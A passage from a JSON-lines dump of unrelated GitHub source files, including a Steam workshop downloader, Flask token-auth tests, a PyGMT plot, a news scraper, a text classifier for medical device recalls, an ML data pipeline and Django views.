+= 1\n if downloads == g_iLimitDownloads:\n print(\"Finished downloading limited map pool ({}/{} plugins downloaded)\".format(downloads, downloads))\n\n time.sleep(10)\n\n except HTTPError as e:\n with download_lock:\n error += 
1\n fail.append(plugin)\n safe_print(\"Server returned \" + str(e.code) + \" error on \" + plugin_display_name)\n\n threads = []\n for plugin in plugins:\n if downloads >= g_iLimitDownloads and g_iLimitDownloads != 0:\n continue\n thread = threading.Thread(target=download_plugin, args=(plugin,))\n thread.start()\n threads.append(thread)\n\n for thread in threads:\n thread.join()\n\n return error, fail, succeed\n\ndef init(argv):\n error = 0\n output_dir = os.getcwd()\n collections_id_list = []\n save_file = os.path.join(output_dir, \"addons.lst\")\n if len(argv) == 1 and not os.path.isfile(save_file):\n print(\"No save file found\")\n usage(argv[0], 0)\n try:\n opts, args = getopt.getopt(argv[1:], \"ho:\")\n except getopt.GetoptError:\n usage(argv[0], 2)\n else:\n for opt, arg in opts:\n if opt == 'h':\n usage(argv[0], 0)\n elif opt == '-o':\n output_dir = os.path.abspath(arg)\n save_file = os.path.join(output_dir, \"addons.lst\")\n if not os.path.exists(output_dir):\n print(output_dir + \": path doesn't exist\\nEnd of program\")\n error += 1\n collections_id_list = argv[len(opts) * 2 + 1:]\n return error, output_dir, collections_id_list, save_file\n\ndef load_saved_data(save_file):\n if os.path.isfile(save_file):\n with open(save_file, 'r') as file:\n saved_data = json.load(file)\n else:\n saved_data = {}\n return saved_data\n\ndef get_plugins_id_from_collections_list(collections_id_list):\n valid_collections = []\n sub_collection = []\n plugins_id_list = []\n error = None\n data = const_data['collection']\n data['collectioncount'] = len(collections_id_list)\n for idx, collection_id in enumerate(collections_id_list):\n data['publishedfileids[' + str(idx) + ']'] = collection_id\n encode_data = urllib.parse.urlencode(data).encode('ascii')\n try:\n response = urllib.request.urlopen(const_urls['collection'], encode_data, timeout=10)\n except HTTPError as e:\n print(\"Server returned \" + str(e.code) + \" error\")\n error = e\n except URLError as e:\n print(\"Can't reach server: \" + e.reason)\n error = e\n else:\n json_response = json.loads(response.read().decode('utf-8'))\n for collection in json_response['response']['collectiondetails']:\n if 'children' in collection:\n valid_collections.append(collection['publishedfileid'])\n for item in collection['children']:\n if item['filetype'] == 0:\n plugins_id_list.append(item['publishedfileid'])\n elif item['filetype'] == 2:\n sub_collection.append(item['publishedfileid'])\n else:\n print(\"Unrecognized filetype: \" + str(item['filetype']))\n if sub_collection:\n error, plugins_id_list_temp, _ = get_plugins_id_from_collections_list(sub_collection)\n if error is None:\n plugins_id_list += plugins_id_list_temp\n return error, plugins_id_list, valid_collections\n\ndef get_plugins_info(plugins_id_list):\n plugin_info = []\n error = None\n data = const_data['file']\n data['itemcount'] = len(plugins_id_list)\n for idx, plugin_id in enumerate(plugins_id_list):\n data['publishedfileids[' + str(idx) + ']'] = plugin_id\n encode_data = urllib.parse.urlencode(data).encode('ascii')\n try:\n response = urllib.request.urlopen(const_urls['file'], encode_data, timeout=10)\n except HTTPError as e:\n print(\"Server returned \" + str(e.code) + \" error\")\n error = e\n except URLError as e:\n print(\"Can't reach server: \" + e.reason)\n error = e\n else:\n json_response = json.loads(response.read().decode('utf-8'))\n for plugin in json_response['response']['publishedfiledetails']:\n plugin_info.append(plugin)\n return error, plugin_info\n\ndef 
plugins_to_remove(plugins_id_list, old_plugins):\n # Initialize a list to store deprecated plugins\n deprecated_plugins = []\n\n # Iterate through the keys (plugin IDs) in old_plugins\n for plugin_id in old_plugins.keys():\n # Check if the plugin ID is not in the plugins_id_list\n if plugin_id not in plugins_id_list:\n # If it's not in the list, it's deprecated, so add it to the deprecated_plugins list\n deprecated_plugins.append(plugin_id)\n\n # Return the list of deprecated plugins\n return deprecated_plugins\n\n\ndef main(argv):\n sleep = 15\n error, output_dir, collections_id_list, save_file = init(argv)\n if error == 0:\n saved_data = load_saved_data(save_file)\n if 'collections' in saved_data:\n if not collections_id_list:\n collections_id_list = saved_data['collections']\n else:\n collections_id_list += saved_data['collections']\n collections_id_list = list(set(collections_id_list))\n if not collections_id_list:\n print(\"No collection(s) ID given and no collection(s) ID found in \" + save_file)\n error = 1\n if error == 0:\n error, plugins_id_list, valid_collections = get_plugins_id_from_collections_list(collections_id_list)\n if error is None:\n saved_data['collections'] = valid_collections\n if 'plugins' in saved_data:\n old_plugins = saved_data['plugins']\n deprecated_plugins = plugins_to_remove(plugins_id_list, old_plugins)\n deprecated_plugins = list(set(deprecated_plugins))\n if deprecated_plugins:\n error, deprecated_plugin_info = get_plugins_info(deprecated_plugins)\n if error is None:\n print(\"\\nSome plugins found which are no longer in workshop collection(s).\")\n print(\"Removing deprecated plugins:\\n\")\n print_deprecated_info(deprecated_plugin_info)\n saved_data, old_plugins = deletePlugins(deprecated_plugins, output_dir, saved_data, old_plugins)\n plugins_id_list += old_plugins.keys()\n plugins_id_list = list(set(plugins_id_list))\n else:\n old_plugins = {}\n saved_data['plugins'] = {}\n error, plugins_info = get_plugins_info(plugins_id_list)\n if error is None:\n num_download_failures = 0\n print(\"\\n\")\n while plugins_info and num_download_failures < 5:\n error, plugins_info, succeed_temp = download_plugins_concurrently(output_dir, plugins_info, old_plugins)\n saved_data['plugins'].update(succeed_temp)\n with open(save_file, 'w') as file:\n json.dump(saved_data, file, indent=4)\n if error > 0:\n print(f\"{len(plugins_info)} plugins failed to download, retrying in {sleep} seconds\")\n time.sleep(sleep)\n num_download_failures += 1\n print('--------------------------------------------------')\n print(f'Failed downloads (attempt #{num_download_failures} / 5)')\n else:\n num_download_failures = 0\n if num_download_failures:\n print('Gave up on downloading all plugins, blame Valve')\n else:\n print('Downloaded all plugins successfully')\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n","repo_name":"gothickitty93/steam_workshop_downloader","sub_path":"workshop.py","file_name":"workshop.py","file_ext":"py","file_size_in_byte":10295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12894244696","text":"import pytest\n\nfrom seventweets.auth import auth\nfrom seventweets.exceptions import Unauthorized\n\n\n@pytest.mark.parametrize(\n ('server_token', 'client_token'),\n [\n ('token', 'different token'),\n (None, 'client token'),\n ('server token', None),\n (None, None),\n ],\n ids=('different', 'only-client', 'only-server', 'none')\n)\ndef test_auth_fail(app, server_token, client_token):\n app.config['ST_API_TOKEN'] 
= server_token\n\n @auth\n def foo():\n return 'content'\n\n with app.test_request_context(headers={'X-Api-Token': client_token}):\n with pytest.raises(Unauthorized):\n foo()\n\n\ndef test_auth_success(app):\n app.config['ST_API_TOKEN'] = 'known_token'\n\n @auth\n def foo():\n return 'content'\n\n with app.test_request_context(headers={'X-Api-Token': 'known_token'}):\n resp = foo()\n assert resp == 'content'\n","repo_name":"sbg/seventweets","sub_path":"tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18914418860","text":"r\"\"\"\nCartesian power\n===============\n\n**X**\\ *width*\\ [**p**\\ *pvalue*]/[*height*\\ [**p**\\ *pvalue*]]: Give the\n*width* of the figure and the optional argument *height*. The axis or axes with\na logarithmic transformation requires **p** and the power transformation for\nthat axis.\n\"\"\"\nimport numpy as np\nimport pygmt\n\n# Create a list of y values 0-10\nyvalues = np.arange(0, 11)\n# Create a list of x-values that are the square of the y-values\nxvalues = yvalues ** 2\n\nfig = pygmt.Figure()\nfig.plot(\n region=[0, 100, 0, 10],\n # Set the power transformation of the x-axis, with a power of 0.5\n projection=\"X15cp0.5/10c\",\n # Set the figures frame, color, and gridlines\n frame=[\"WSne+givory\", \"xa1p\", \"ya2f1\"],\n # Set the line thickness to *thick*\n # Use the default color *black* and the default style *solid*\n pen=\"thick\",\n x=xvalues,\n y=yvalues,\n)\n# Plot x,y values as points on the line\n# Style of points is 0.2 cm circles, color is *green* with a *black* outline\n# Points are not clipped if they go off the figure\nfig.plot(x=xvalues, y=yvalues, style=\"c0.2c\", color=\"green\", no_clip=True, pen=\"black\")\nfig.show()\n","repo_name":"geodeepak/Pygmt","sub_path":"examples/projections/nongeo/cartesian_power.py","file_name":"cartesian_power.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24303172123","text":"# -*- coding: utf-8 -*-\r\nservicio = Field(\"servicio\")\r\ntipo_servicio = Field(\"tipo_servicio\",label=\"Tipo de servicio\")\r\nsector = Field(\"sector\")\r\nno_traza = Field(\"no_traza\",label=\"No de Traza\")\r\nsoporte = Field(\"soporte\")\r\n\r\npar_en_rack = Field(\"par_en_rack\",label=\"Par en rack\")\r\ncable = Field(\"cable\")\r\npar = Field(\"par\")\r\nterminal = Field(\"terminal\")\r\n\r\ndireccion = Field(\"direccion\",label=\"Dirección\")\r\ncircuito_de_linea = Field(\"circuito_de_linea\",label=\"Circuito de Línea\")\r\nsitio = Field(\"sitio\")\r\ncentral = Field(\"central\")\r\ndb.define_table(\"facilidades_pe\",servicio,tipo_servicio,sector,no_traza,soporte,par_en_rack,cable,par,terminal,direccion,circuito_de_linea,sitio,central)\r\n\r\n#,requires=IS_IN_DB(db,db.facilidades_pe.servicio)\r\nservicio_pe = Field(\"servicio_pe\")\r\ndb.define_table(\"servicios_nauta_hogar\",servicio_pe)","repo_name":"geordanisb/sisgiem","sub_path":"applications/odr/models/planta_exterior.py","file_name":"planta_exterior.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22398743583","text":"import sys\nfrom itertools import combinations\n\nn, m = map(int, input().split())\n\nmaps=[]\nfor i in range(n):\n maps.append(list(map(int, input().split())))\n\nresult = 
[]\nhome=[]\nchicken=[]\n\nfor i in range(n):\n for j in range(n):\n if maps[i][j] == 1:\n home.append((i, j))\n\n elif maps[i][j] == 2:\n chicken.append((i, j))\n\npick_chicken = list(combinations(chicken, m))\n\nfor chi in pick_chicken:\n temp = 0\n for h in home:\n chi_len = 999\n for j in range(m):\n chi_len = min(chi_len, abs(h[0] - chi[j][0]) + abs(h[1] - chi[j][1]))\n temp += chi_len\n result.append(temp)\n \nprint(min(result))","repo_name":"parksangmyeong1/Algorithm","sub_path":"Python/브루트포스/[BOJ]치킨 배달.py","file_name":"[BOJ]치킨 배달.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40474685507","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom collector.practice.CollectorService import get_daum_news\n\nmain_url = 'https://news.daum.net/breakingnews/digital'\n# SSL Error 가 뜰 경우 -> requests.get(url, verify=False)\n\nresult = requests.get(main_url)\n\ndoc = BeautifulSoup(result.text, 'html.parser')\n\n# : a태그는 클릭했을 때 해당 url로 이동\n# len() : list[]의 갯수를 알려주는 함수\nurl_list = doc.select('ul.list_news2 a.link_txt')\n# pprint.pprint(title_list)\n\n# enumerate() : 반복하면서 index번호와 item을 모두 가져옴\n# list[] 의 index는 0번부터 시작\n# len(list) = 15, index 0 ~ 14\n\nfor i, url in enumerate(url_list):\n print(f'인덱스:{i+1}, url: {url[\"href\"]}')\n get_daum_news(url[\"href\"])","repo_name":"latteisacat/cnu_ai_senti_analysis","sub_path":"collector/practice/DaumNewsList.py","file_name":"DaumNewsList.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7258977146","text":"from setuptools import setup, find_packages\nfrom sys import version_info\nfrom gitclonesync import VERSION\n\n# this is so horriby unfortunate. 
see readme\nif version_info[0] > 2:\n print(\"ERROR: This project requires GitPython, which does not currently support Python3\")\n raise SystemExit(1)\nif version_info[0] == 2 and version_info[1] < 7:\n print(\"ERROR: This project uses argparse, which requires Python 2.7+\")\n raise SystemExit(1)\n\nwith open('README.rst') as file:\n long_description = file.read()\n\nwith open('CHANGES.rst') as file:\n long_description += '\\n' + file.read()\n\nrequires = [\n 'GitPython>=0.3.2.1',\n 'github3.py>=0.8.2',\n]\n\nclassifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Natural Language :: English',\n 'Operating System :: POSIX',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 2 :: Only',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Version Control',\n 'Topic :: Utilities',\n]\n\nsetup(\n name='gitclonesync',\n version=VERSION,\n author='Jason Antman',\n author_email='jason@jasonantman.com',\n packages=find_packages(),\n entry_points={\n 'console_scripts': [\n 'git_clone_sync = gitclonesync.clonesyncer:cli_entry',\n 'set_github_remote = gitclonesync.githubclone:cli_entry',\n ],\n },\n url='http://github.com/jantman/git-clone-sync/',\n license='GPLv3+',\n description='Script to keep git clones in sync with origin and upstream',\n long_description=long_description,\n install_requires=requires,\n keywords=\"git clone cron\",\n classifiers=classifiers\n)\n","repo_name":"jantman/git-clone-sync","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1364043828","text":"import sys\r\nfrom lvs_ssh import start_ssh\r\n\r\ndef get_ios(sh_ver):\r\n '''\r\n Get IOS from switches\r\n '''\r\n sh_ver = sh_ver.split('\\r\\n')\r\n sh_ver = [i for i in sh_ver if i.rstrip()!='']\r\n image = 'ios: error'\r\n model = 'model: error'\r\n for line in sh_ver:\r\n #Get the model name\r\n if line.startswith('Model number'):\r\n model = line.split()[-1]\r\n #Get the ios name from 'sh ver'\r\n if 'System image' in line:\r\n image = line.split()[-1].split(':')[-1].rstrip('\"')\r\n if image[0] == '/':\r\n image = image.replace('/', '')\r\n return model, image\r\n\r\nresult = []\r\nresult_s = []\r\nssh_res = start_ssh('sh ver')\r\nresult = [get_ios(i[1]) for i in ssh_res]\r\nresult = sorted(list(set(result)))\r\nfor line in result:\r\n result_s.append('{:25} {}\\n'.format(line[0], line[1]))\r\nwith open('ios', 'w') as f:\r\n f.writelines(result_s)\r\nprint(result)\r\n","repo_name":"romalukin/lan_scripts","sub_path":"get_ios.py","file_name":"get_ios.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29344912727","text":"from Rexample import *\nclass Manzoniexample(Rexample):\n# this class produces SoilR test that reflect the nomenclature of the manzoni paper\n# and allow to specify the analytic solutions that can not be computed by sympy\n\n def __init__(self,name,matrix,c_sym,meanTransitTime,subslist):\n nr=matrix.rows \n inputrates=zeros(nr,1)\n f=lambda el:el.subs(subslist)\n iv=Matrix([f(ci) for ci in c_sym])\n 
self.iv=iv/iv.norm()\n self.c_sym=c_sym\n self.subslist=subslist\n self.meanTransitTime=meanTransitTime\n\n super(Manzoniexample,self).__init__(name,matrix,iv,inputrates)\n self.trunk=\"runit.Manzoni.\"+name\n self.n=nr\n############################################################################\n def setUpVars(self):\n Text=\"\"\n for i in range(len(self.subslist)):\n tup=self.subslist[i]\n print(tup)\n Text+=(self.shift+str(tup[0])+\"=\"+str(tup[1])+\"\\n\")\n # we start not at zero since some of the analytical solutions yield NaN for t=0\n Text+=\"\\\n t_start=0.0\\n\\\n t_end=2\\n\\\n tn=100\\n\\\n tol=.02/tn\\n\\\n #print(tol)\\n\\\n timestep=(t_end-t_start)/tn\\n\\\n t=seq(t_start,t_end,timestep)\\n\\\n A=new(\\\"ConstLinDecompOp\\\",\"+rmatrixprint(self.matrix,self.shift)+\")\\n\"\n\n Text+=\"\\\n inputrates=new(\\\"TimeMap\\\",t_start,t_end,function(t){return(\"+rmatrixprint(self.inputrates,self.shift)+\")})\\n\"\n return(Text)\n\n############################################################################\n def analyticCandResp(self):\n sl=self.subslist\n inputrates=self.inputrates.subs(sl)\n m=self.matrix.subs(sl)\n c_sym=self.c_sym\n ck=self.iv\n n=m.rows\n t= Symbol(\"t\")\n tau= Symbol(\"tau\")\n self.anls=(m*t).exp()*c_sym+((m*tau).exp()*inputrates).integrate((tau,0,t))\n print(self.anls)\n print(self.anls.subs({t:0}))\n testvec=ones(1,n)\n respcoeffs=-testvec*m\n print(\"respcoeff=\\n\",respcoeffs)\n self.anlresp=(respcoeffs.transpose()).multiply_elementwise(self.anls)\n self.c_sym_strs=[str(c_i) for c_i in c_sym]\n self.n=n\n############################################################################\n def setUpModel(self):\n Text=super(Manzoniexample,self).setUpModel()\n Text+=\"\\\n meanTransitTimeode=getMeanTransitTime(\\n\\\n A,\\n\"\\\n +rlistprint(self.c_sym_strs,self.shift)\\\n +\"\\n)\\n\"\n Text+=\"\\\n TTDode=getTransitTimeDistributionDensity(\\n\\\n A,\\n\"\\\n +rlistprint(self.c_sym_strs,self.shift)\\\n +\"\\n,t\\n)\\n\"\n return(Text)\n############################################################################\n def sols(self):\n Text=super(Manzoniexample,self).sols()\n Text+=\"meanTransitTime=\"+str(self.meanTransitTime)+\"\\n\"\n return(Text)\n############################################################################\n def plots(self):\n Text=super(Manzoniexample,self).plots()\n Text+=\"\\\n plot(t,TTDode,type=\\\"l\\\",lty=lt1,col=1,ylab=\\\"TransitTimeDistributionDensity\\\",xlab=\\\"Time\\\")\\n\"\n return(Text)\n############################################################################\n def checks(self):\n Text=super(Manzoniexample,self).checks()\n Text+=\"\\\n checkEquals(\\n\\\n meanTransitTime,\\n\\\n meanTransitTimeode,\\n\\\n \\\"test numeric solution for the mean transit Tiye computed by the ode mehtod against analytical value taken from manzoni et al\\\",\\n\\\n tolerance = tol,\\n\\\n )\\n\"\n return(Text)\n\n\n","repo_name":"MPIBGC-TEE/SoilR","sub_path":"pkg/inst/tests/automatic/Manzoniexample.py","file_name":"Manzoniexample.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"38735573607","text":"import itertools\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterable,\n List,\n Mapping,\n Sequence,\n TypeVar,\n Union,\n)\n\nimport datasets\nimport numpy as np\nimport tokenizers\nfrom tokenizers import Tokenizer\n\nfrom .common import Config, get_logger\n\nT = TypeVar(\"T\")\nlogger = get_logger()\n\n\nRNGLike = Union[int, 
np.random.Generator]\n\n\ndef _to_rng(rng_like: RNGLike) -> np.random.Generator:\n return np.random.default_rng(rng_like) if isinstance(rng_like, int) else rng_like\n\n\ndef _stream_huggingface_dataset(\n *args: str,\n **kwargs: str,\n) -> Iterable[Dict[str, Any]]:\n dataset = datasets.load_dataset(*args, **kwargs, streaming=True)\n return (dict(sample) for sample in dataset)\n\n\ndef _load_huggingdace_tokenizer(\n *args: str,\n **kwargs: str,\n) -> Tokenizer:\n if len(args) == 1 and args[0].strip().lower().endswith(\".json\"):\n logger.info(f\"Loading tokenizer from JSON file: {args[0]}\")\n return Tokenizer.from_file(*args, **kwargs)\n logger.info(f\"Loading tokenizer from HuggingFace: {args}, {kwargs}\")\n return tokenizers.Tokenizer.from_pretrained(*args, **kwargs)\n\n\ndef load_huggingface_dataset(\n args: Iterable[str],\n kwargs: Mapping[str, str],\n load_dataset_fn: Callable[\n ..., Iterable[Dict[str, Any]]\n ] = _stream_huggingface_dataset,\n repeat_forever: bool = False,\n) -> Iterable[str]:\n if isinstance(args, str):\n raise TypeError(f\"Expected args to be a sequence of str, got {args}\")\n args = list(args)\n kwargs = dict(kwargs)\n key = kwargs.pop(\"key\", \"text\")\n for epoch in itertools.count():\n logger.info(\n f\"Streaming dataset from HuggingFace: {args}, {kwargs} (epoch: {epoch})\"\n )\n dataset = load_dataset_fn(*args, **kwargs)\n samples = (sample[key] for sample in dataset)\n samples = (sample for sample in samples if sample.strip())\n yield from samples\n if not repeat_forever:\n break\n\n\ndef merge_datasets(\n datasets: Iterable[Iterable[T]],\n weights: Iterable[float],\n rng: RNGLike,\n) -> Iterable[T]:\n p = np.array(list(weights), dtype=float)\n p = p / p.sum()\n rng = _to_rng(rng)\n iterators = [iter(dataset) for dataset in datasets]\n while True:\n index = rng.choice(len(iterators), p=p)\n yield next(iterators[index])\n\n\ndef tokenizer_from_config(\n config: Config,\n) -> Tokenizer:\n return load_huggingface_tokenizer(\n config.tokenizer.args,\n config.tokenizer.kwargs,\n )\n\n\ndef load_huggingface_tokenizer(\n args: Iterable[str],\n kwargs: Mapping[str, str],\n load_tokenizer_fn: Callable[..., Tokenizer] = _load_huggingdace_tokenizer,\n) -> Tokenizer:\n return load_tokenizer_fn(*args, **kwargs)\n\n\ndef tokenize_samples(\n samples: Iterable[str],\n tokenizer: Tokenizer,\n batch_size: int = 1000,\n) -> Iterable[Iterable[int]]:\n def tokenizer_fn(texts: Sequence[str]) -> Sequence[Sequence[int]]:\n return [enc.ids for enc in tokenizer.encode_batch(texts)]\n\n batched_indices = (tokenizer_fn(chunk) for chunk in chunks(samples, batch_size))\n indices = (index for batch in batched_indices for index in batch)\n yield from indices\n\n\ndef chain_and_split(\n arrays: Iterable[Iterable[T]],\n length: int,\n) -> Iterable[Iterable[T]]:\n ids = (id for array in arrays for id in array)\n yield from chunks(ids, length)\n\n\ndef chunks(\n iterable: Iterable[T],\n size: int,\n drop_last: bool = False,\n) -> Iterable[Sequence[T]]:\n iterator = iter(iterable)\n while True:\n chunk = list(itertools.islice(iterator, size))\n if not chunk:\n break\n if drop_last and len(chunk) < size:\n break\n yield chunk\n\n\ndef shuffle(\n xs: Iterable[T],\n buffer_size: int,\n rng: RNGLike,\n) -> Iterable[T]:\n if buffer_size <= 0:\n raise ValueError(f\"Expected buffer_size > 0, got {buffer_size}\")\n rng = _to_rng(rng)\n buffer: List[T] = list(itertools.islice(xs, buffer_size))\n for x in xs:\n index = rng.integers(len(buffer))\n buffer[index], x = x, buffer[index]\n yield x\n yield 
from rng.permutation(np.array(buffer), 0)\n\n\ndef batches_from_config(\n config: Config,\n rng: Union[int, np.random.Generator],\n extra_length: int = 0,\n) -> Iterable[np.ndarray]:\n rng = _to_rng(rng)\n datasets = (\n load_huggingface_dataset(\n args=ds.args,\n kwargs=ds.kwargs,\n repeat_forever=True,\n )\n for ds in config.dataset\n )\n # Shuffle the samples of each dataset. This prevents the samples from\n # low-frequency datasets to be almost sequential due to a too-small buffer\n # size for the final shuffle.\n datasets = (\n shuffle(\n xs=ds,\n buffer_size=config.data.per_dataset_shuffle_buffer_size,\n rng=rng,\n )\n for ds in datasets\n )\n weights = (ds.weight for ds in config.dataset)\n dataset = merge_datasets(datasets=datasets, weights=weights, rng=rng)\n tokenizer = load_huggingface_tokenizer(\n args=config.tokenizer.args,\n kwargs=config.tokenizer.kwargs,\n )\n indices = tokenize_samples(dataset, tokenizer)\n indices = chain_and_split(arrays=indices, length=config.data.length + extra_length)\n # Shuffle the individual chunks\n indices = shuffle(\n xs=indices,\n buffer_size=config.data.shuffle_buffer_size,\n rng=rng,\n )\n batches = chunks(indices, size=config.data.batch_size)\n arrays = (np.array(batch, dtype=np.int32) for batch in batches)\n return arrays\n","repo_name":"nlsfnr/NoLo","sub_path":"nolo/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23958569774","text":"# %%\n# %%\n# with tf.Session() as session:\n# session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n# message_embeddings = session.run(embed(messages))\n# for i, message_embedding in enumerate(np.array(message_embeddings).tolist()):\n# print(\"Message: {}\".format(messages[i]))\n# print(\"Embedding size: {}\".format(len(message_embedding)))\n# message_embedding_snippet = \", \".join(\n# (str(x) for x in message_embedding[:3]))\n# print(\"Embedding: [{}, ...]\\n\".format(message_embedding_snippet))\n\n# %%\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport seaborn as sns\nimport numpy as np\nimport pickle\nfrom sklearn.linear_model import SGDClassifier, LogisticRegression\nfrom sklearn.metrics import accuracy_score, f1_score, classification_report\n# %%\n# @return a list of dataframes\n\n\ndef getData(dataDir='/Users/adamchang/programming/Medical Device Security/Embedding/Data/Auto_Data/',\n fileSuffix='.xlsx', startYear=2014, endYear=2019,\n filenamePattern='unique[0123456789]{4}_auto_determined.xlsx'):\n files = os.listdir(dataDir)\n dfList = []\n for filename in files:\n if re.match(filenamePattern, filename) is not None:\n year = int(filename.split('.')[0].split('unique')[1].split('_')[0])\n if year >= startYear and year <= endYear:\n name = dataDir + filename.split('.')[0] + fileSuffix\n df = pd.read_excel(name)\n dfList.append((df, filename.split('.')[0]))\n return dfList\n\n\ndef labelToOrdinal(s):\n if str(s) == 'Not_Computer':\n return 0\n else:\n return 1\n\n\ndef ordinalToLabel(d):\n if (d == 0).bool():\n return 'Not_Computer'\n else:\n return 'Computer'\n\n\ndef train(xTrain, yTrain):\n # model = SGDClassifier(loss='hinge', penalty='l2', alpha=1e-3,\n # random_state=42, max_iter=50, tol=1e-3)\n model = LogisticRegression(random_state=0)\n model.fit(xTrain, yTrain)\n # pickle.dump(model, open(\n # '/Users/adamchang/programming/Medical 
Device Security/Embedding/Data/Aux_Data/trained_model_embedding.txt', 'w'))\n # print('model dumped')\n return model\n\n\ndef test(testData, model, session):\n for dfTestTuple in testData:\n dfTest = dfTestTuple[0]\n messages = dfTest['Reason for Recall'].values.astype('U')\n message_embeddings = session.run(embed(messages))\n xTest = message_embeddings\n yPred = model.predict(xTest)\n yLabel = dfTest['Fault_Class'].apply(labelToOrdinal).values\n\n print('performance on ' + dfTestTuple[1])\n print('percent computer related predicted')\n print(np.sum(yPred) / float(np.size(yPred)))\n print('percent computer related true')\n print(np.sum(yLabel) / float(np.size(yLabel)))\n print(classification_report(yLabel, yPred))\n print(\"accuracy: {:.2f}%\".format(accuracy_score(yLabel, yPred) * 100))\n print(\"f1 score: {:.2f}%\".format(f1_score(yLabel, yPred) * 100))\n\n dfPred = pd.DataFrame(\n yPred, columns=['Predicted Fault Class']).apply(ordinalToLabel,\n axis=1)\n dfTest = pd.concat([dfTest, dfPred],\n axis=1)\n filename = '/Users/adamchang/programming/Medical Device Security/Embedding/Data/Auto_Data/' + \\\n dfTestTuple[1] + '_prediction.xlsx'\n dfTest.to_excel(filename, index=False, engine='xlsxwriter')\n\n# %%\n# os.environ['TFHUB_CACHE_DIR'] = '../tf_cache/'\n# @param [\"https://tfhub.dev/google/universal-sentence-encoder/2\", \"https://tfhub.dev/google/universal-sentence-encoder-large/3\"]\n\n\nmodule_url = \"https://tfhub.dev/google/universal-sentence-encoder-large/3\"\nembed = hub.Module(module_url)\ntf.logging.set_verbosity(tf.logging.ERROR)\nsession = tf.Session()\nsession.run([tf.global_variables_initializer(), tf.tables_initializer()])\n\n# %%\ndf = pd.read_excel(\n '/Users/adamchang/programming/Medical Device Security/Embedding/Data/Merged_Data/Merged_Final_Unique_Recalls_2007_2013_groundtruth.xlsx')\nmessages = df['Reason for Recall'].values\nxTrain = session.run(embed(messages))\n# %%\nyTrain = df['Fault Class']\nyTrain = yTrain.apply(labelToOrdinal)\nmodel = train(xTrain, yTrain)\n# %%\ntestData = getData()\n# %%\ntest(testData, model, session)\n\n\n# %%\n","repo_name":"achang77/Medical-Device-Security","sub_path":"Embedding/Scripts/sentence_encoder.py","file_name":"sentence_encoder.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24145868992","text":"from app.models import Home, ExtraImage, ContactInfo, Favorites\nfrom django.db.models import Q\nfrom django.views import generic as generic_views\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n\nclass UserLogin(generic_views.ListView):\n\n def post(self, request, **kwargs):\n username = request.POST['username']\n password = request.POST['password']\n next_page = request.POST.get('next')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n\n return HttpResponseRedirect(next_page or reverse('mainpage'))\n else:\n return 'invalid login'\n\n\nclass UserLogout(generic_views.ListView):\n\n def post(self, request, **kwargs):\n next_page = request.POST.get('next')\n logout(request)\n return HttpResponseRedirect(next_page or reverse('mainpage'))\n\n\nclass UserCreateTemplateView(generic_views.TemplateView):\n template_name = 'logincreate/create.html'\n context_object_name = 'create'\n\n\nclass PremiumHomeTemplateView(generic_views.ListView):\n template_name = 'main_page/main_page.html'\n 
context_object_name = 'homes'\n\n def get_queryset(self):\n qset = Home.objects.filter(published=True)\n qset = qset.filter(is_premium=True)\n return qset\n\n\nclass HomeTemplateView(generic_views.ListView):\n template_name = 'homes_page/homes_page.html'\n context_object_name = 'homes'\n\n def get_queryset(self):\n qset = Home.objects.all()\n if not self.request.GET.get('q'):\n return Home.objects.filter(published=True)\n else:\n params = self.request.GET['q']\n if params:\n\n # Poor mans search endpoint\n search_term = params.strip()\n\n\n qset = qset.filter(\n Q(title__icontains=search_term) |\n Q(city__icontains=search_term) |\n Q(street__icontains=search_term) |\n Q(mlsnumber__number__icontains=search_term)\n )\n return qset.distinct()\n\n\nclass HomeDetailsTemplateView(generic_views.ListView):\n template_name = 'details_page/details_page.html'\n context_object_name = 'details'\n\n def get_queryset(self):\n qset = Home.objects.get(pk=self.kwargs['id'])\n if ExtraImage.objects.filter(home=self.kwargs['id']).exists():\n qset.extrainfo = ExtraImage.objects.get(home=self.kwargs['id'])\n 